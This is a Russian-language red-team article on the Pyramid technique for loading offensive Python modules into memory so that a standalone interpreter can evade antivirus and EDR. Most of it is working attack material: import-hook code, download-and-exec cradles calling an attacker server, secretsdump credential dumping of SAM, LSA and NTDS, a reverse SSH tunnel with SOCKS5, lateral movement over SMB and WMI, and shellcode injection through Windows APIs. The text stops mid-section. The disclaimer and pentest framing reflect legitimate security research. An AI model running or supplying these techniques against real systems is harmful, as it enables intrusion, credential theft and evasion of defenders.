В этой статье я покажу, как воору­жить standalone-интер­пре­татор Python для заг­рузки опас­ных зависи­мос­тей пря­мо в память при помощи инс­тру­мен­та Pyramid (не путать с веб‑фрей­мвор­ком). Потен­циаль­но это поз­воля­ет обой­ти анти­вирус­ную защиту при пен­тесте и скрыть источник подоз­ритель­ной телемет­рии от EDR при опе­раци­ях Red Team.

Сколь­ко есть раз­ных тех­ник обхо­да анти­вирус­ных механиз­мов и EDR-решений — и не сос­читать! Обфуска­ция и шиф­рование полез­ной наг­рузки, динами­чес­кое раз­решение WinAPI, сис­темные вызовы, отло­жен­ное исполне­ние, укло­нение от хуков защит­ных про­дук­тов, под­пись .exe спу­фан­ными сер­тифика­тами, флук­туирующие начин­ки, под­мена сте­ка вызовов... Кажет­ся, этот спи­сок мож­но про­дол­жать бес­конеч­но.

А если пред­положить, что сущес­тву­ют такие «сле­пые» зоны, оста­ваясь в пре­делах которых мож­но без­наказан­но тво­рить что заб­лагорас­судит­ся (в гра­ницах разум­ного) и не боять­ся при этом спа­лить весь ред­тиминг? Что ж, такие зоны дей­стви­тель­но есть, и это никакой не Ring 0, а обыч­ный интер­пре­татор Python! На питоне написа­но огромное количес­тво нас­тупатель­ных ути­лит, но запус­кать их при­нято с уда­лен­ной машины. Почему? Ах да, зависи­мос­ти...

Се­год­ня мы с тобой раз­берем под­ход Living-Off-the-Blindspot, пред­став­ленный иссле­дова­телем Диего Кап­риот­ти (@naksyn) на недав­нем DEF CON 30.

warning Статья име­ет озна­коми­тель­ный харак­тер и пред­назна­чена для спе­циалис­тов по безопас­ности, про­водя­щих тес­тирова­ние в рам­ках кон­трак­та. Автор и редак­ция не несут ответс­твен­ности за любой вред, при­чинен­ный с при­мене­нием изло­жен­ной информа­ции. Рас­простра­нение вре­донос­ных прог­рамм, наруше­ние работы сис­тем и наруше­ние тай­ны перепис­ки прес­леду­ются по закону.

Что к чему и почему

Да­вай спер­ва оки­нем взо­ром теорию и раз­берем­ся, почему твой анти­вирус (или EDR) зна­ет о тебе все, потом пой­мем прин­цип бес­фай­лового импорта модулей в Python, а затем перей­дем к рас­смот­рению его реали­зации в Pyramid. Для пер­вых двух час­тей я вос­поль­зуюсь слай­дами ори­гиналь­ного выс­тупле­ния.

Пер­вое, на чем хочет­ся заос­трить вни­мание, — это две самые любимые тех­ники раз­работ­чиков защит­ного соф­та для ана­лиза поведе­ния прог­рамм:

ху­ки Windows API (Win32 или Native) в поль­зователь­ском прос­транс­тве;

под­писка на уве­дом­ления о чувс­тви­тель­ных событи­ях в прос­транс­тве ядра.

Хуки в userland

Что­бы отсле­живать зло­упот­ребле­ние механиз­мами Windows API, твой анти­вирус, ско­рее все­го, пат­чит джам­пами реали­зации фун­кций из биб­лиотек user32. dll и ntdll. dll пос­ле их заг­рузки в память ана­лизи­руемым про­цес­сом. Пос­ле вызова таких, казалось бы, ори­гиналь­ных фун­кций WinAPI ничего не подоз­рева­ющий про­цес­сор натал­кива­ется на соот­ветс­тву­ющий джамп, ука­зыва­ющий на область памяти уже под­гру­жен­ной биб­лиоте­ки средс­тва защиты, и сле­дует по нему, в резуль­тате чего кон­троль над потоком выпол­нения прог­раммы переда­ется анти­виру­су.

Те­перь «вирусо­нена­вис­тник» может как угод­но измы­вать­ся над тво­им про­цес­сом, иссле­дуя его вир­туаль­ную память и про­водя дру­гие одно­му богу извес­тные про­вер­ки, по резуль­татам которых будет вынесен вер­дикт: «виновен» (заб­локиро­вать выпол­нение API-фун­кции или, может, вооб­ще убить про­цесс) или «оправдан» («отпустить» поток выпол­нения исходной прог­рамме).

Что‑то похожее мы про­вора­чива­ли, ког­да экспе­римен­тирова­ли с тех­никой флук­туирующе­го шелл‑кода. Тог­да наш джамп (патч для перех­вата кон­тро­ля над фун­кци­ей kernel32! Sleep ) выг­лядел при­мер­но так:

/ * { 0x49, 0xBA, 0x37, 0x13, 0xD3, 0xC0, 0x4D, 0xD3, 0x37, 0x13, 0x41, 0xFF, 0xE2 } Disassembly: 0: 49 ba 37 13 d3 c0 4d movabs r10, 0x1337d34dc0d31337 7: d3 37 13 a: 41 ff e2 jmp r10 */ uint8_t trampoline [ ] = { 0x49 , 0xBA , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , // mov r10, addr 0x41 , 0xFF , 0xE2 // jmp r10 } ;

www Я уже рекомен­довал статью @ShitSecure A tale of EDR bypass methods, где дос­тупным язы­ком разоб­раны популяр­ные при­емы, которые при­меня­ются средс­тва­ми защиты, и спо­собы их обхо­да. Пов­торение — мать уче­ния, и к тому же там тоже есть про хуки в userland.

Уведомления обратного вызова в ядре

Ку­да более мощ­ный механизм сох­ранения кон­тро­ля над поведе­нием про­цес­сов реали­зует­ся через ядер­ный механизм Notification Callback Routines. Он пре­дос­тавля­ет интерфей­сы для реали­зации фун­кций под­писки на потен­циаль­но опас­ные события, нап­ример вызов ntdll! NtCreateProcess . Ког­да получе­но уве­дом­ление о соз­дании нового про­цес­са, EDR бежит внед­рять свои биб­лиоте­ки в целевой про­цесс, что­бы в том чис­ле иметь воз­можность пат­чить стан­дар­тные биб­лиоте­ки Windows API, как опи­сано в пре­дыду­щем раз­деле.

Дру­гой показа­тель­ный при­мер того, зачем нуж­ны Kernel Callbacks, — тай­млайн зап­рета получе­ния дос­тупа к памяти про­цес­са lsass. exe , опи­сан­ный в дру­гом кру­том ресер­че с DEF CON 30 — EDR detection mechanisms and bypass techniques with EDRSandBlast авто­ров @th3m4ks и @_Qazeer.

Так, получая уве­дом­ления о нежела­тель­ных событи­ях на каж­дом из эта­пов дам­па LSASS (соз­дание про­цес­са дам­пера, получе­ние им хен­дла lsass. exe , чте­ние памяти lsass. exe , соз­дание фай­ла с резуль­тиру­ющим слеп­ком памяти), анти­вирус или EDR может выс­тро­ить мно­гоуров­невую за­щиту от получе­ния зло­умыш­ленни­ком учет­ных дан­ных из памяти сетево­го узла.

Су­щес­тву­ет куча дру­гих под­ходов, как пре­дот­вра­тить вре­донос­ную активность на конеч­ных точ­ках, нап­ример ска­ниро­вание памяти запущен­ных про­цес­сов по пла­ниров­щику, но для базово­го пред­став­ления нашей темы это­го будет дос­таточ­но.

Слепые зоны EDR

В исходной статье автор раз­деля­ет стра­тегии бай­паса EDR на четыре основные области. Мы сок­ратим их до трех:

Свес­ти к миниму­му свое при­сутс­твие на узле, где уста­нов­лен EDR. Для это­го дос­таточ­но иметь SOCKS-прок­си на сто­роне жер­твы и мар­шру­тизи­ровать через него тра­фик во внут­реннюю сеть или к локаль­ным ресур­сам машины (Impacket тебе в помощь). Всту­пить в апри­орно нерав­ный бой с EDR: анху­кать биб­лиоте­ки, крип­товать свой арсе­нал до посине­ния, жить с sleep 100500 , выпол­няя по одной коман­де в сут­ки, думать о рис­ках каж­дого вве­ден­ного в кон­соль сим­вола. Это слож­но (очень). Обыч­но это мож­но себе поз­волить, если весь твой инс­тру­мен­тарий кас­томный, но, как люди исполь­зуют ту же «Кобу» (зап­рещен­ный на тер­ритории РФ инс­тру­мент) на про­ектах, я пока так и не понял. Опе­риро­вать из сле­пых зон EDR. Сюда мож­но отнести исполь­зование легитим­ных тулз адми­нис­три­рова­ния и раз­работ­ки во вре­донос­ных целях, нап­ример воору­жить офи­циаль­ный (и под­писан­ный) бинарь Python для мал­варно­го трей­дкраф­та пря­мо на машине‑жер­тве.

Что про­исхо­дит внут­ри интер­пре­тато­ра Python и как трак­товать те или иные мар­керы его поведе­ния? «А черт его зна­ет...» — так отве­тят не толь­ко боль­шинс­тво из нас, но и мно­гие вен­доры защит­ного ПО. Для нас пре­лесть это­го язы­ка в том, что, начиная с вер­сии 3.7, офи­циаль­ная сбор­ка интер­пре­тато­ра пос­тавля­ется в standalone-виде, то есть не тре­бует уста­нов­ки на хост.

Кро­ме того, до тех пор, пока мы оста­емся в пре­делах интер­пре­тато­ра (то есть не выпол­няем инжекты в дру­гие про­цес­сы или не соз­даем новых), вся телемет­рия исхо­дит от под­писан­ного python. exe , а это не облегча­ет жизнь защит­ному ПО, ког­да надо раз­бирать­ся, что из это­го есть что.

Итак, что же нам нуж­но, что­бы воору­жить standalone-интер­пре­татор Python?

Бесфайловый импорт зависимостей

Для начала опре­делим­ся, так ли оно нам надо — заг­ружать модули пря­мо в память? Чем пло­хо при­нес­ти их на хост и положить рядом с интер­пре­тато­ром?

Как мож­но видеть, такой трюк у нас не про­катит. Да и вооб­ще сох­ранять что‑либо на диск — пло­хая прак­тика. Ког­да есть воз­можность, луч­ше всег­да это­го избе­гать.

Примечание о вендоре AV В этой статье мы сно­ва будем исполь­зовать решение Kaspersky Endpoint Security в качес­тве мерила резуль­татов наших экспе­римен­тов. Что­бы не было обви­нений в пред­взя­тос­ти или домыс­лов о том, что у меня какие‑то лич­ные сче­ты с этим про­дук­том (так как он уже не в пер­вый раз встре­чает­ся в моих тек­стах), я сра­зу рас­став­лю все точ­ки над i. Ис­ходя из моего лич­ного опы­та KES — луч­шее анти­вирус­ное решение в ру‑сег­менте. Поэто­му логика его исполь­зования в лабора­тор­ных испы­тани­ях оче­вид­на: обой­дешь его — зна­чит, ско­рее все­го, обой­дешь про­дук­ты дру­гих вен­доров, ког­да они встре­тят­ся в про­екте. Ча­ще все­го как на внут­ренних пен­тестах, так и при опе­раци­ях Red Team мы (отдел ана­лиза защищен­ности Angara Security) встре­чаем­ся имен­но с KES, поэто­му опять же целесо­образно иссле­довать имен­но его реак­цию на «внеш­ние раз­дра­жите­ли», что­бы знать, чего нам ожи­дать. К тому же я знаю, что кол­леги «по ту сто­рону» дефен­са иног­да прос­матри­вают мои каляки, поэто­му, воз­можно, таким обра­зом я тоже вно­шу свой малень­кий вклад в раз­витие это­го про­дук­та.

Вся магия бес­фай­лового импорта внеш­них модулей в Python кро­ется в фиче Meta Import Hooks, вве­ден­ной неког­да ве­лико­душ­ным пожиз­ненным дик­татором Гви­до ван Рос­сумом в ревизии 302 руководс­тва PEP. В этом кон­тек­сте Meta hooks — это спо­соб раз­решения импорта, реали­зован­ный в виде клас­са и стре­ляющий в самом начале алго­рит­ма поис­ка модуля. Для срав­нения есть дру­гой спо­соб импорти­ровать зависи­мос­ти — Path Import Hooks, который, как мож­но догадать­ся по наз­ванию, осно­ван на поис­ке нуж­ного питону модуля по опре­делен­ным путям, заранее извес­тным интер­пре­тато­ру.

Те­кущие зна­чения Meta hooks мож­но пос­мотреть в перемен­ной sys. meta_path , Path hooks — в sys. path .

То есть все, что нам нуж­но сде­лать, — это написать собс­твен­ный класс импорте­ра модулей, которые мы будем получать в виде архи­вов, нап­ример, по HTTP, и зарегис­три­ровать его как Meta hook. Изи!

Раз­берем реали­зацию такого клас­са в инс­тру­мен­те Pyramid.

CFinder

Как извес­тно, все новое — это хорошо забытое ста­рое, поэто­му цепоч­ка заимс­тво­вания клас­са CFinder (Custom Finder) тянет­ся аж с 2015 года: из про­екта remote_importer он был поза­имс­тво­ван коман­дой EmpireProject в реали­зации С2-аген­та EmPyre и далее мель­кал в некото­рых дру­гих нас­тупатель­ных фрей­мвор­ках.

Пой­дем свер­ху вниз, начав со вспо­мога­тель­ных методов.

CFinder._get_info

class CFinder () : def __init__ ( self , repo_name ) : self . repo_name = repo_name self . _source_code = { } def _get_info ( self , repo_name , full_name ) : parts = full_name . split ( '. ' ) submodule = parts [ - 1 ] module_path = '/ ' . join ( parts ) for suffix , is_package in ( ( '. py' , False ) , ( '/ __init__. py' , True )) : relative_path = module_path + suffix try : ZIPPED [ repo_name ] . getinfo ( relative_path ) except KeyError : continue else : return submodule , is_package , relative_path raise ImportError ( f'Unable to locate module { submodule } in the { repo_name } repo' )

Конс­трук­тор при­нима­ет в качес­тве аргу­мен­та имя модуля, который мы хотим импорти­ровать, а метод _get_info отда­ет информа­цию о сущес­тво­вании того или ино­го питоня­чего фай­ла в архи­ве ZIP. Если при обра­бот­ке оче­ред­ного исходни­ка интер­пре­татор нат­кнет­ся на инс­трук­цию import < ИМЯ_МОДУЛЯ> (при­чем неваж­но, в вер­хне­уров­невом скрип­те или в импортах дру­гих модулей) и дру­гие импорте­ры не смо­гут с ней спра­вить­ся, этот вспо­мога­тель­ный метод попыта­ется раз­решить зависи­мость сна­чала по пути АРХИВ → < ИМЯ_МОДУЛЯ>. py , а потом по пути АРХИВ → < ИМЯ_МОДУЛЯ>/ __init__. py , если пер­вая попыт­ка про­вали­лась.

Для наг­ляднос­ти я возь­му прос­той и всем извес­тный модуль colorama, добав­лю вот такую строч­ку перед клю­чевым сло­вом return :

print ( submodule , is_package , relative_path )

За­тем заг­ружу модуль из памяти. Детали заг­рузки нам пока неин­терес­ны, прос­то пос­мотрим на вывод print .

Ви­дим, что информа­ция обо всех импортах при заг­рузке модуля colorama раз­решилась рекур­сивно. Идем даль­ше.

CFinder._get_source

def _get_source_code ( self , repo_name , full_name ) : submodule , is_package , relative_path = self . _get_info ( repo_name , full_name ) full_path = f' { repo_name } / { relative_path } ' if relative_path in self . _source_code : code = self . _source_code [ relative_path ] return submodule , is_package , full_path , code try : code = ZIPPED [ repo_name ] . read ( relative_path ) . decode ( ) code = code . replace ( ' \ r\ n ' , ' \ n ' ) . replace ( ' \ r ' , ' \ n ' ) self . _source_code [ relative_path ] = code return submodule , is_package , full_path , code except : raise ImportError ( f'Unable to obtain source code for module { full_path } ' )

Вспо­мога­тель­ный метод _get_source_code зап­рашива­ет информа­цию о мес­тополо­жении фай­ла с иско­мым исходни­ком, который тре­бует­ся при импорте, с помощью рас­смот­ренно­го выше метода _get_info . Пос­ле того как файл най­ден, мы лезем за ним по отданно­му пути в ZIP-архив, чита­ем его содер­жимое и отда­ем в качес­тве резуль­тата вмес­те с допол­нитель­ной информа­цией об име­нах и рас­положе­нии модуля. Пока все прос­то.

CFinder.find_module

def find_module ( self , full_name , path = None ) : try : self . _get_info ( self . repo_name , full_name ) except ImportError : return None return self

Под­бира­емся к самому инте­рес­ному — методам, которые будет исполь­зовать интер­пре­татор пос­ле регис­тра­ции метаху­ка. Метод find_module дол­жен при­сутс­тво­вать в клас­се резол­вера и отда­вать информа­цию о заг­рузчи­ке модуля. В нашем слу­чае это прос­то обер­тка над реали­зован­ным ранее методом _get_info .

CFinder.load_module

def load_module ( self , full_name ) : _ , is_package , full_path , source = self . _get_source_code ( self . repo_name , full_name ) code = compile ( source , full_path , 'exec' ) spec = importlib . util . spec_from_loader ( full_name , loader = None ) module = sys . modules . setdefault ( full_name , importlib . util . module_from_spec ( spec ) ) module . __loader__ = self module . __file__ = full_path module . __name__ = full_name if is_package : module . __path__ = [ os . path . dirname ( module . __file__ ) ] exec ( code , module . __dict__ ) return module

Сер­дце клас­са CFinder — метод load_module, вызыва­ющий встро­енную фун­кцию compile для пред­варитель­ной ком­пиляции кода импорти­руемо­го модуля и его под­готов­ки к пос­леду­ющей переда­че на вход фун­кции exec . Так­же в рам­ках это­го метода мы офор­мля­ем объ­ект модуля, что­бы для интер­пре­тато­ра он не отли­чал­ся от обыч­ного импорта с дис­ка.

В общем‑то, это и есть вся магия. В коде Pyramid есть реали­зация дру­гих необя­затель­ных методов, таких как get_data и get_code, но для нас они не пред­став­ляют инте­реса и могут быть исклю­чены из финаль­ной реали­зации.

Использование CFinder

@ staticmethod def install_hook ( repo_name ) : if repo_name not in META_CACHE : finder = CFinder ( repo_name ) META_CACHE [ repo_name ] = finder sys . meta_path . append ( finder ) @ staticmethod def hook_routine ( zip_name , zip_bytes ) : ZIPPED [ zip_name ] = ZipFile ( io . BytesIO ( zip_bytes ) , 'r' ) CFinder . install_hook ( zip_name )

Ис­поль­зовать написан­ный класс про­ще прос­того: сна­чала мы вызыва­ем ста­тичес­кий метод CFinder. hook_routine и отда­ем ему имя и бай­ты (содер­жимое) ZIP-архи­ва, заг­ружен­ного извне. Это доб­ро сох­раня­ется в гло­баль­но опре­делен­ный сло­варь ZIPPED , уже мель­кав­ший в коде рань­ше, и далее метахук регис­три­рует­ся фун­кци­ей install_hook . Пос­ледняя добав­ляет экзем­пляр нашего кас­томно­го клас­са CFinder к спис­ку sys. meta_path . При попыт­ке выпол­нить импорт, который не будет раз­решен никаким дру­гим импорте­ром, в игру всту­пит наш CFinder и под­гру­зит тре­буемый модуль из памяти.

def build_http_request ( filename ) : context = ssl . SSLContext ( ssl . PROTOCOL_TLS_CLIENT ) context . check_hostname = False context . verify_mode = ssl . CERT_NONE request = urllib . request . Request ( f'https:/ / { PYRAMID_HOST } : { PYRAMID_PORT } / { filename } . zip' ) auth = b64encode ( bytes ( f' { PYRAMID_USERNAME } : { PYRAMID_PASSWORD } ' , 'ascii' )) . decode ( ) request . add_header ( 'Authorization' , f'Basic { auth } ' ) return context , request def download_and_import () : for module in PYRAMID_TO_IMPORT : print ( f'[ *] Downloading and importing module in memory: { module } ' ) context , request = build_http_request ( module ) with urllib . request . urlopen ( request , context = context ) as response : zip_bytes = response . read ( ) CFinder . hook_routine ( module , zip_bytes ) print ( '[ +] Hooks installed!' )

Для поряд­ка при­веду финаль­ные фун­кции‑помощ­ники, забира­ющие зипы с уда­лен­ного сер­вера по HTTPS с Basic-аутен­тифика­цией. Здесь вро­де все понят­но без допол­нитель­ных пояс­нений.

Особые случаи импорта

К сожале­нию, не все питонов­ские модули мож­но заг­рузить из памяти. Речь идет в основном о фай­лах . pyd , пред­став­ляющих собой динами­чес­ки раз­деля­емые биб­лиоте­ки с байт‑кодом Python, и о стан­дар­тных для Windows DLL-либах, иду­щих в ком­плек­те с некото­рыми модуля­ми.

Та­кого ста­фа навалом, нап­ример, в биб­лиоте­ках с крип­тогра­фией, которые всег­да нуж­ны при работе с про­токо­лами.

Что­бы удов­летво­рить такие зависи­мос­ти, нам при­дет­ся заг­ружать и рас­паковы­вать их на диск. За это отве­чает хел­пер download_and_unpack :

def download_and_unpack () : for module in PYRAMID_TO_UNPACK : print ( f'[ *] Downloading and unpacking module: { module } ' ) context , request = build_http_request ( module ) with urllib . request . urlopen ( request , context = context ) as response : zip_bytes = response . read ( ) with ZipFile ( io . BytesIO ( zip_bytes ) , 'r' ) as z : z . extractall ( os . getcwd () )

Пол­ный код того, что у меня получи­лось пос­ле нез­начитель­ного рефак­торин­га исходно­го про­екта, мож­но най­ти у меня на GitHub. Рядом лежат пре­сеты для генера­ции боевых скрип­тов на осно­ве обще­го тем­плей­та, которы­ми мы будем поль­зовать­ся в сле­дующем раз­деле.

www По­ка готовил матери­алы для статьи, нашел инте­рес­ный репози­торий httpimport, который, судя по опи­санию, уме­ет делать все то же самое, что реали­зова­ли мы, но с допол­нитель­ными плюш­ками. Сам я этот код не тес­тил, но, может, тебе будет инте­рес­но с ним поиг­рать.

Pyramid в действии

impacket-secretsdump

Пред­ста­вим, что мы ока­зались на машине с EDR, который не дает нам сдам­пить сек­реты LSA, по­лучить дос­туп к хра­нили­щу SAM или про­вес­ти DCSync, потому что Invoke-Mimikatz.ps1 отка­зыва­ется гру­зить­ся в память.

Ко­неч­но же, пер­вое, что при­ходит на ум, — исполь­зовать secretsdump.py из кол­лекции Impacket, который может помочь спра­вить­ся с любой из перечис­ленных выше задач. Как мы уже поняли, прос­то положить модуль Impacket на диск не получит­ся, и нам приш­лось бы прок­сировать тра­фик во внут­реннюю сеть, что­бы заюзать secretsdump. py уда­лен­но. Но мож­но сде­лать и на самой машине‑жер­тве с помощью бес­фай­лового импорта зависи­мос­тей.

Что­бы запус­тить secretsdump. py , нам нуж­но перепа­ковать спи­сок зависи­мос­тей Impacket, что уже сде­лал за нас автор инс­тру­мен­та. Далее я покажу, как это мож­но при­менить для запус­ка дру­гих модулей, а пока вос­поль­зуем­ся готовы­ми архи­вами из ди­рек­тории Server.

Для наг­ляднос­ти я под­готовил нес­коль­ко прос­тых Bash-скрип­тов, генери­рующих финаль­ный пей­лоад. Вот как выг­лядит скрипт для сбор­ки secretsdump. py :

#!/ usr/ bin/ env bash cat < < EOT > pwn. py PYRAMID_HOST = '10. 10. 13. 37' PYRAMID_PORT = '443' PYRAMID_USERNAME = 'attacker' PYRAMID_PASSWORD = 'Passw0rd1!' PYRAMID_TO_UNPACK = ( 'Cryptodome', ) PYRAMID_TO_IMPORT = ( 'setuptools', 'pkg_resources', 'jaraco', '_distutils_hack', 'distutils', 'cffi', 'configparser', 'future', 'chardet', 'flask', 'ldap3', 'ldapdomaindump', 'pyasn1', 'OpenSSL', 'pyreadline', 'six', 'markupsafe', 'werkzeug', 'jinja2', 'click', 'itsdangerous', 'dns', 'impacket', ) SECRETSDUMP_TARGET = '127. 0. 0. 1' SECRETSDUMP_DOMAIN = 'megacorp. local' SECRETSDUMP_USERNAME = 'j. doe' SECRETSDUMP_PASSWORD = 'Passw0rd2!' EOT cat { cfinder, secretsdump } .py > > pwn. py

Здесь cfinder. py — шаб­лон, содер­жащий базовую реали­зацию клас­са CFinder, а secretsdump. py — нем­ного из­менен­ный secretsdump.py с пре­доп­ределен­ным набором перемен­ных (вход­ных парамет­ров) SECRETSDUMP_* , задан­ных в скрип­те выше.

Для нужд хос­тинга фай­лов автор пред­лага­ет исполь­зовать собс­твен­ную ре­али­зацию прос­того HTTPS-сер­вера на Python с Basic-аутен­тифика­цией, одна­ко я буду исполь­зовать http-server, очень полюбив­ший­ся мне при про­веде­нии пен­тестов.

Я сге­нери­рую финаль­ную наг­рузку, а затем дву­мя коман­дами соз­дам самопод­писан­ный SSL-сер­тификат и под­ниму HTTP-сер­вер с ука­зани­ем кре­дов для Basic-аутен­тифика­ции.

$ . / secretsdump. sh $ openssl req -newkey rsa: 2048 -new -nodes -x509 -days 3650 -keyout key. pem -out cert. pem $ http- server -d false -p 443 -S --username attacker --password 'Passw0rd1!'

Пос­ле это­го на нашей импро­визи­рован­ной машине‑жер­тве я заг­ружу све­жий релиз standalone-интер­пре­тато­ра Python с офи­циаль­ного сай­та, запущу python. exe от име­ни адми­нис­тра­тора и выпол­ню коман­ды заг­рузчи­ка.

import ssl import urllib. request from base64 import b64encode context = ssl . SSLContext ( ssl . PROTOCOL_TLS_CLIENT ) context . check_hostname = False context . verify_mode = ssl . CERT_NONE request = urllib . request . Request ( 'https:// 10. 10. 13. 37/ pwn. py' ) auth = b64encode ( bytes ( 'attacker: Passw0rd1!' , 'ascii' )) . decode ( ) request . add_header ( 'Authorization' , f'Basic { auth } ' ) payload = urllib . request . urlopen ( request , context = context ) . read ( ) exec ( payload )

Ву­аля, мы получи­ли содер­жимое SAM и LSA, не вво­дя при этом страш­ных команд вро­де reg save hklm\ system ololo. hive . Так же лег­ко я могу сдам­пить NTDS в домен­ной сре­де уда­лен­но без инс­тру­мен­тов вро­де Mimikatz.

SOCKS over SSH

Как уже не раз упо­мина­лось, нас­трой­ка SOCKS-соеди­нения с машиной‑жер­твой — неотъ­емле­мая часть жиз­ни любого этич­ного хакера. И в этом нам тоже может помочь Pyramid.

В модуле Paramiko есть готовый SSH-кли­ент, бла­года­ря которо­му мы можем уста­новить обратное соеди­нение с машиной ата­кующе­го по SSH, выпол­нить обратный проб­рос локаль­ного пор­та с жер­твы на ата­кующе­го и раз­вернуть на жер­тве сер­вер SOCKS5, слу­шающий на проб­рошен­ном пор­те.

Сна­чала пос­мотрим, как это работа­ет в искусс­твен­ных усло­виях. С жер­твы я под­клю­чусь к сво­ей машине с Kali по SSH и под­ниму на проб­рошен­ном пор­те SOCKS-сер­вер с помощью pproxy.

PS > ssh -R 444: 127. 0. 0. 1: 443 snovvcrash@192. 168. 1. 80 PS > pip install pproxy PS > pproxy -l "http+socks4+socks5:// 127. 0. 0. 1: 443"

Те­перь я могу нас­тро­ить ProxyChains на порт 444 и вза­имо­дей­ство­вать с внут­ренней сетью импро­визи­рован­ного «заказ­чика».

Со­берем скрипт, который мы запус­тим из памяти. Для это­го автор ском­биниро­вал реали­зацию rforward.py из Paramiko и модуль pproxy, исполь­зован­ный выше. В этот раз сно­ва не обой­дет­ся без зависи­мос­тей, которые необ­ходимо рас­паковать на диск, — это крип­тогра­фия в . pyd -фай­лах для SSH.

#!/ usr/ bin/ env bash cat < < EOT > pwn. py PYRAMID_HOST = '10. 10. 13. 37' PYRAMID_PORT = '443' PYRAMID_USERNAME = 'attacker' PYRAMID_PASSWORD = 'Passw0rd1!' PYRAMID_TO_UNPACK = ( 'paramiko_pyds_dependencies', ) PYRAMID_TO_IMPORT = ( 'six', 'cffi', 'paramiko', 'proto', ) SSH_USERNAME = 'attacker' SSH_PASSWORD = 'Passw0rd2!' SSH_CONNECTION = ( '10. 10. 13. 37', int( '22')) # Attacker SSH_REMOTE_FORWARD = '444' # Listening on Attacker SSH_LOCAL_FORWARD = '443' # Forwarded to Victim SSH_FORWARD_CONNECTION = ( '127. 0. 0. 1', int( SSH_LOCAL_FORWARD) ) SOCKS_CONNECTION = f'http+socks4+socks5:// 127. 0. 0. 1:{ SSH_LOCAL_FORWARD} ' EOT cat { cfinder, socks5 } .py > > pwn. py

В этом при­мере покажем, что тех­ника Pyramid при­мени­ма и в слу­чае, ког­да у ата­кующе­го нет дос­тупа к гра­фичес­кой обо­лоч­ке целевой сис­темы. Для это­го я спер­ва исполь­зую smbclient, что­бы рекур­сивно перенес­ти содер­жимое дирек­тории с Python-интер­пре­тато­ром.

$ curl -sSL https:/ / www. python. org/ ftp/ python/ 3. 10. 8/ python- 3. 10. 8- embed- amd64. zip > python- 3. 10. 8- embed- amd64. zip $ mkdir python- 3. 10. 8- embed- amd64 $ cd python- 3. 10. 8- embed- amd64 $ unzip -q .. / python- 3. 10. 8- embed- amd64. zip $ vi cradle. py $ smbclient '// VICTIM/ C$' -U j. doe% 'Passw0rd3!' -c ' prompt OFF; recurse ON; cd \ Users\ j. doe\ Downloads; mkdir python-3. 10. 8-embed-amd64; cd python-3. 10. 8-embed-amd64; mput \ *'

Те­перь все, что нуж­но сде­лать, — это выпол­нить единс­твен­ную коман­ду на жер­тве, запус­кающую headless-питон pythonw. exe с ука­зани­ем пути до пер­вично­го скрип­та‑заг­рузчи­ка. Далее мож­но отки­нуть­ся на спин­ку крес­ла и нас­лаждать­ся про­цес­сом.

$ wmiexec. py j. doe: 'Passw0rd3!' @VICTIM '\ Users\ j. doe\ Downloads\ python-3. 10. 8-embed-amd64\ pythonw. exe \ Users\ j. doe\ Downloads\ python-3. 10. 8-embed-amd64\ cradle. py' -nooutput -silentcommand

Та­ким обра­зом, при активном средс­тве анти­вирус­ной защиты мы получи­ли обратное SSH-соеди­нение, поверх которо­го запус­тили SOCKS-сер­вер и теперь можем вза­имо­дей­ство­вать с ресур­сами внут­ренней кор­поратив­ной сети «заказ­чика». И напоми­наю, что все перечис­ленное про­изош­ло в памяти, без раз­мещения подоз­ритель­ных исполня­емых фай­лов на дис­ке!

Python.NET

Ав­тор инс­тру­мен­та пред­ложил инте­рес­ный спо­соб запус­кать дру­гие прог­раммы внут­ри про­цес­са интер­пре­тато­ра Python, а имен­но — кон­верта­ция шелл‑кода из BOF-фай­лов (Beacon Object Files) с помощью BOF2shellcode и пос­леду­ющий инжект в локаль­ный про­цесс питона нехит­рым API-трио HeapCreate , RtlMoveMemory , CreateThread :

HeapCreate = ctypes . windll . kernel32 . HeapCreate HeapCreate . argtypes = [ wt . DWORD , ctypes . c_size_t , ctypes . c_size_t ] HeapCreate . restype = wt . HANDLE RtlMoveMemory = ctypes . windll . kernel32 . RtlMoveMemory RtlMoveMemory . argtypes = [ wt . LPVOID , wt . LPVOID , ctypes . c_size_t ] RtlMoveMemory . restype = wt . LPVOID CreateThread = ctypes . windll . kernel32 . CreateThread CreateThread . argtypes = [ wt . LPVOID , ctypes . c_size_t , wt . LPVOID , wt . LPVOID , wt . DWORD , wt . LPVOID ] CreateThread . restype = wt . HANDLE WaitForSingleObject = kernel32 . WaitForSingleObject WaitForSingleObject . argtypes = [ wt . HANDLE , wt . DWORD ] WaitForSingleObject . restype = wt . DWORD heap = HeapCreate ( 0x00040000 , len ( sc ) , 0 ) HeapAlloc ( heap , 0x00000008 , len ( sc ) ) print ( '[ *] HeapAlloc() Memory at: {: 08X} ' . format ( heap ) ) RtlMoveMemory ( heap , sc , len ( sc ) ) print ( '[ *] Shellcode copied into memory. ' ) thread = CreateThread ( 0 , 0 , heap , 0 , 0 , 0 ) print ( '[ *] CreateThread() in same process. ' ) WaitForSingleObject ( thread , 0xFFFFFFFF )

Я решил пой­ти по дру­гому пути и при­нес­ти с собой на жер­тву CLR .NET-кода, вызыва­емый из Python. То есть офор­мить модуль Python.NET для его исполь­зования с Pyramid. В резуль­тате мы можем заг­ружать прог­раммы .NET по прин­ципу Reflective Assembly из памяти про­цес­са интер­пре­тато­ра Python. Это не избавля­ет нас от необ­ходимос­ти укло­нять­ся от AMSI при исполне­нии, одна­ко для это­го есть дру­гой трюк — donut!

Идея в том, что­бы кон­верти­ровать заведо­мо «палящу­юся» сбор­ку .NET в позици­онно незави­симый шелл‑код и исполь­зовать его вмес­те с три­виаль­ным инжекто­ром на C#. Как сде­лать недетек­тиру­емый инжектор, мы под­робно обсужда­ли, ког­да му­чили KeePass, а для это­го демо я вос­поль­зуюсь сво­им зак­рытым инс­тру­мен­том для авто­мати­зиро­ван­ной генера­ции такого инжекто­ра.

Пос­ле ком­пиляции инжекто­ра я его сож­му и завер­ну в Base64:

> > > import zlib > > > from base64 import b64encode > > > > > > with open ( 'Program. exe' , 'rb' ) as f : > > > b64encode ( zlib . compress ( f . read () , level = 9 )) . decode ( ) # < ASSEMBLY_BYTES_BASE64>

И теперь с помощью такого прос­того тем­плей­та мож­но вызывать из памяти Python нас­тупатель­ные сбор­ки .NET:

